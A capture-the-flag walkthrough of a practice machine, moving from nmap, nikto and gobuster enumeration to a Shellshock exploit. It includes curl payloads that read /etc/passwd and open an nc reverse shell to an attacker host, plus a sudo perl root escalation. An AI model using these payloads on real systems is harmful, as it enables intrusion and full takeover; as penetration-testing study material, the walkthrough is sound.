- Port scan
nmap -Pn 10.10.10.56nmap -Pn -p1000- 10.10.10.56
There’re 2 open ports: 80 and 2222.
2. OS and service scan
nmap -A -p80,2222 10.10.10.56
3. Vuln scan
nmap --script vuln -p80,2222 10.10.10.56
4. nikto
nikto -h http://10.10.10.56
5. gobuster and dirb
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.10.10.56/ -x php,txt,html,sh,cgi -q
While waiting for gobuster forever I decided to use dirb instead
dirb http://10.10.10.56/
Further directory enumeration, starting w/ cgi-bin
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.10.10.56/cgi-bin/ -x php,txt,html,sh,cgi -qThere’s user.sh
6. Access HTTP Site
Nothing more
7. HTTP Shellshock
Since I have user.sh in cgi-bin, let’s test for shellshock
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" http://10.10.10.56/cgi-bin/user.shSucceed. I can proceed to getting reverse shell
Prepare for listener
rlwrap nc -lvp 443
Get the reverse shell using these commands
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attacker ip> 443 >/tmp/f'" http://10.10.10.56/cgi-bin/user.sh
Back to the listener, I got the shell.
8. Privilege Escalation
Start w/ explore directory
cd /homels -lacd shellyls -la
I got user.txt
Another thing is .sudo_as_admin_successful
verify sudo
sudo -lI can use perl.
Using guide from GTFOBins
sudo perl -e 'exec "/bin/sh";'
cd /rootls -la
